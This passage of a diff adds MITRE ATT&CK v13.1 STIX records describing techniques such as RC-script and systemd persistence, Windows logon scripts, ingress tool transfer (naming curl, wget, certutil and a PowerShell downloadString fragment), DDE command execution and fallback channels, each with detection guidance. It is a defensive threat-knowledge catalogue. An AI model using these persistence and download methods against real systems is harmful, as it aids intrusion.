+ "url": "https://attack.mitre.org/techniques/T1037/004"
+ },
+ {
+ "source_name": "IranThreats Kittens Dec 2017",
+ "url": "https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/",
+ "description": "Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten, A Case of Ambiguity and Shared Code. Retrieved May 28, 2020."
+ },
+ {
+ "description": "Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.",
+ "url": "https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/",
+ "source_name": "Intezer HiddenWasp Map 2019"
+ },
+ {
+ "source_name": "intezer-kaiji-malware",
+ "url": "https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/",
+ "description": "Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020."
+ },
+ {
+ "source_name": "Apple Developer Doco Archive Launchd",
+ "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html",
+ "description": "Apple. (2016, September 13). Daemons and Services Programming Guide - Creating Launch Daemons and Agents. Retrieved February 24, 2021." 
+ },
+ {
+ "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html",
+ "description": "Apple. (2016, September 13). Startup Items. Retrieved July 11, 2017.",
+ "source_name": "Startup Items"
+ },
+ {
+ "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf",
+ "description": "Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.",
+ "source_name": "Methods of Mac Malware Persistence"
+ },
+ {
+ "source_name": "Ubuntu Manpage systemd rc",
+ "url": "http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html",
+ "description": "Canonical Ltd.. (n.d.). systemd-rc-local-generator - Compatibility generator for starting /etc/rc.local and /usr/sbin/halt.local during boot and shutdown. Retrieved February 23, 2021."
+ }
+ ],
+ "modified": "2021-04-27T19:58:01.927Z",
+ "name": "RC Scripts",
+ "description": "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system\u2019s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.\n\nAdversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.\n\nAdversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)\n\nSeveral Unix-like systems have moved to Systemd and deprecated the use of RC scripts. 
This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "x_mitre_detection": "Monitor for unexpected changes to RC scripts in the /etc/ directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior.\n\nMonitor for /etc/rc.local file creation. Although types of RC scripts vary for each Unix-like distribution, several execute /etc/rc.local if present. ",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "2.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "x_mitre_data_sources": [
+ "File: File Modification",
+ "Process: Process Creation",
+ "Command: Command Execution",
+ "File: File Creation"
+ ],
+ "x_mitre_permissions_required": [
+ "root"
+ ]
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b.json
new file mode 100644
index 0000000000000000000000000000000000000000..6be303a0b2bd4a21ad240ec4291e8680d885b784
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b.json
@@ -0,0 +1,95 @@
+{
+ "type": "bundle",
+ "id": "bundle--1e195e35-bf95-4343-a37e-9c547d2a32b1",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-04-12T20:13:07.604Z",
+ "name": "Systemd Service",
+ "description": "Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible. \n\nSystemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`). (Citation: lambert systemd 2022) \n\nService unit files use the following directives to execute system commands:(Citation: freedesktop systemd.service) \n\n* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives cover execution of commands when a service is started manually by `systemctl`, or on system start if the service is set to automatically start.\n* `ExecReload` directive covers when a service restarts. \n* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives cover when a service is stopped. 
\n\nAdversaries may abuse systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files systemd uses upon reboot or starting a service.(Citation: Anomali Rocke March 2019) Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.\n\nThe `.service` file\u2019s `User` directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions.(Citation: Rapid7 Service Persistence 22JUNE2016) ",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ }
+ ],
+ "x_mitre_contributors": [
+ "Tony Lambert, Red Canary",
+ "Emad Al-Mousa, Saudi Aramco"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_detection": "Monitor file creation and modification events of Systemd service unit configuration files in the default directory locations for `root` & `user` level permissions. Suspicious processes or scripts spawned in this manner will have a parent process of \u2018systemd\u2019, a parent process ID of 1, and will usually execute as the `root` user.(Citation: lambert systemd 2022) \n\nSuspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: `systemctl list-units -\u2013type=service \u2013all`. 
Analyze the contents of `.service` files present on the file system and ensure that they refer to legitimate, expected executables, and symbolic links.(Citation: Berba hunting linux systemd)\n\nAuditing the execution and command-line arguments of the `systemctl` utility, as well related utilities such as `/usr/sbin/service` may reveal malicious systemd service execution.",
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux"
+ ],
+ "x_mitre_version": "1.3",
+ "x_mitre_data_sources": [
+ "Command: Command Execution",
+ "Service: Service Modification",
+ "Process: Process Creation",
+ "File: File Modification",
+ "Service: Service Creation",
+ "File: File Creation"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "root"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b",
+ "created": "2020-01-17T16:15:19.870Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T1543/002",
+ "external_id": "T1543.002"
+ },
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang"
+ },
+ {
+ "source_name": "freedesktop systemd.service",
+ "description": "Free Desktop. (n.d.). systemd.service \u2014 Service unit configuration. Retrieved March 20, 2023.",
+ "url": "https://www.freedesktop.org/software/systemd/man/systemd.service.html"
+ },
+ {
+ "source_name": "Linux man-pages: systemd January 2014",
+ "description": "Linux man-pages. (2014, January). systemd(1) - Linux manual page. 
Retrieved April 23, 2019.",
+ "url": "http://man7.org/linux/man-pages/man1/systemd.1.html"
+ },
+ {
+ "source_name": "Berba hunting linux systemd",
+ "description": "Pepe Berba. (2022, January 30). Hunting for Persistence in Linux (Part 3): Systemd, Timers, and Cron. Retrieved March 20, 2023.",
+ "url": "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/"
+ },
+ {
+ "source_name": "Rapid7 Service Persistence 22JUNE2016",
+ "description": "Rapid7. (2016, June 22). Service Persistence. Retrieved April 23, 2019.",
+ "url": "https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence"
+ },
+ {
+ "source_name": "lambert systemd 2022",
+ "description": "Tony Lambert. (2022, November 13). ATT&CK T1501: Understanding systemd service persistence. Retrieved March 20, 2023.",
+ "url": "https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58.json
new file mode 100644
index 0000000000000000000000000000000000000000..d737bd70309ba54b9b477ed923be1eea78ac0c67
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58.json
@@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--7cc89fec-8e43-4dc2-981d-5ffc7f2f60ee", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:50.920Z", + "name": "Software Discovery", + "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. 
Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Process: OS API Execution", + "Process: Process Creation", + "Firewall: Firewall Enumeration", + "Command: Command Execution", + "Firewall: Firewall Metadata" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "id": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "created": "2019-09-16T17:52:44.147Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1518", + "external_id": "T1518" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add.json new file mode 100644 index 0000000000000000000000000000000000000000..d0fb4051a718d5b75b95014910ef0902d13ce6cd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add.json 
@@ -0,0 +1,72 @@ +{ + "type": "bundle", + "id": "bundle--d9495516-678f-4849-8082-f94a3f0c93be", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-14T19:27:57.370Z", + "name": "Ingress Tool Transfer", + "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)\n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_contributors": [ + "John Page (aka hyp3rlinx), ApparitionSec", + "Mark Wee" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. 
Use of utilities, such as [ftp](https://attack.mitre.org/software/S0095), that does not normally occur may also be suspicious.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Specifically, for the finger utility on Windows and Linux systems, monitor command line or terminal execution for the finger command. Monitor network activity for TCP port 79, which is used by the finger utility, and Windows netsh interface portproxy modifications to well-known ports such as 80 and 443. Furthermore, monitor file system for the download/creation and execution of suspicious files, which may indicate adversary-downloaded payloads. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "File: File Creation" + ], + "type": "attack-pattern", + "id": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "created": "2017-05-31T21:31:16.408Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1105", + "external_id": "T1105" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. 
Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "t1105_lolbas", + "description": "LOLBAS. (n.d.). LOLBAS Mapped to T1105. Retrieved March 11, 2022.", + "url": "https://lolbas-project.github.io/#t1105" + }, + { + "source_name": "PTSecurity Cobalt Dec 2016", + "description": "Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.", + "url": "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3.json new file mode 100644 index 0000000000000000000000000000000000000000..1ea5cac261a4cbff5c034440ea909efe78527c7a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3.json 
@@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--44a75af4-3f7d-4a5a-a67b-225b1328f20c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3", + "type": "attack-pattern", + "created": "2020-01-10T03:43:37.211Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1037.001", + "url": "https://attack.mitre.org/techniques/T1037/001" + }, + { + "url": "https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx", + "description": "Microsoft. (2005, January 21). Creating logon scripts. Retrieved April 27, 2016.", + "source_name": "TechNet Logon Scripts" + }, + { + "source_name": "Hexacorn Logon Scripts", + "url": "http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/", + "description": "Hexacorn. (2014, November 14). Beyond good ol\u2019 Run key, Part 18. Retrieved November 15, 2019." + } + ], + "modified": "2020-03-24T23:45:03.153Z", + "name": "Logon Script (Windows)", + "description": "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_detection": "Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\\Environment\\UserInitMprLogonScript.\n\nMonitor running process for actions that could be indicative of abnormal programs or executables running upon logon.", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Creation" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0.json new file mode 100644 index 0000000000000000000000000000000000000000..2ccd5a401ecab822ccc929c4984a9a31efe220c3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0.json 
@@ -0,0 +1,86 @@ +{ + "type": "bundle", + "id": "bundle--c30444f1-aeda-4c08-bbf1-86788f986d24", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "type": "attack-pattern", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1173", + "url": "https://attack.mitre.org/techniques/T1173" + }, + { + "url": "https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/", + "description": "Cimpanu, C. (2017, December 15). Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks. Retrieved December 19, 2017.", + "source_name": "BleepingComputer DDE Disabled in Word Dec 2017" + }, + { + "url": "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021", + "description": "Microsoft. (2017, December 12). ADV170021 - Microsoft Office Defense in Depth Update. Retrieved February 3, 2018.", + "source_name": "Microsoft ADV170021 Dec 2017" + }, + { + "url": "https://technet.microsoft.com/library/security/4053440", + "description": "Microsoft. (2017, November 8). Microsoft Security Advisory 4053440 - Securely opening Microsoft Office documents that contain Dynamic Data Exchange (DDE) fields. Retrieved November 21, 2017.", + "source_name": "Microsoft DDE Advisory Nov 2017" + }, + { + "url": "https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/", + "description": "El-Sherei, S. (2016, May 20). PowerShell, C-Sharp and DDE The Power Within. 
Retrieved November 22, 2017.", + "source_name": "SensePost PS DDE May 2016" + }, + { + "url": "https://www.contextis.com/blog/comma-separated-vulnerabilities", + "description": "Kettle, J. (2014, August 29). Comma Separated Vulnerabilities. Retrieved November 22, 2017.", + "source_name": "Kettle CSV DDE Aug 2014" + }, + { + "url": "https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee", + "description": "Nelson, M. (2018, January 29). Reviving DDE: Using OneNote and Excel for Code Execution. Retrieved February 3, 2018.", + "source_name": "Enigma Reviving DDE Jan 2018" + }, + { + "url": "https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/", + "description": "Stalmans, E., El-Sherei, S. (2017, October 9). Macro-less Code Exec in MSWord. Retrieved November 21, 2017.", + "source_name": "SensePost MacroLess DDE Oct 2017" + }, + { + "url": "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/", + "description": "NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.", + "source_name": "NVisio Labs DDE Detection Oct 2017" + } + ], + "modified": "2022-02-09T20:22:43.284Z", + "name": "Dynamic Data Exchange", + "description": "Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. 
(Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)\n\nAdversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_detection": "OLE and Office Open XML files can be scanned for \u2018DDEAUTO', \u2018DDE\u2019, and other strings indicative of DDE execution. (Citation: NVisio Labs DDE Detection Oct 2017)\n\nMonitor for Microsoft Office applications loading DLLs and other modules not typically associated with the application.\n\nMonitor for spawning of unusual processes (such as cmd.exe) from Microsoft Office applications.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_permissions_required": [ + "User" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433.json new file mode 100644 index 0000000000000000000000000000000000000000..2ea124914128bccad86f64075a96ea29261a2a13 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--97c82de7-1fc1-489d-a367-0717f41a3c06", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "type": "attack-pattern", + "created": "2017-05-31T21:30:21.689Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1008", + "external_id": "T1008" + }, + { + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "source_name": "University of Birmingham C2" + } + ], + "modified": "2020-07-14T19:49:47.340Z", + "name": "Fallback Channels", + "description": "Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. 
(Citation: University of Birmingham C2)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636.json new file mode 100644 index 0000000000000000000000000000000000000000..8cd0c2e7248a107f9417bb29c86e6b4e328c351c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636.json 
@@ -0,0 +1,67 @@ +{ + "type": "bundle", + "id": "bundle--901fa337-dce8-45c9-9a87-1b7ecc7f1760", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636", + "type": "attack-pattern", + "created": "2020-10-01T02:17:46.086Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1588.005", + "url": "https://attack.mitre.org/techniques/T1588/005" + }, + { + "source_name": "Exploit Database", + "url": "https://www.exploit-db.com/", + "description": "Offensive Security. (n.d.). Exploit Database. Retrieved October 15, 2020." + }, + { + "source_name": "TempertonDarkHotel", + "description": "Temperton, J. (2015, August 10). Hacking Team zero-day used in new Darkhotel attacks. Retrieved March 9, 2017.", + "url": "https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage" + }, + { + "source_name": "NationsBuying", + "description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.", + "url": "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html" + }, + { + "url": "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/", + "description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group\u2019s iPhone 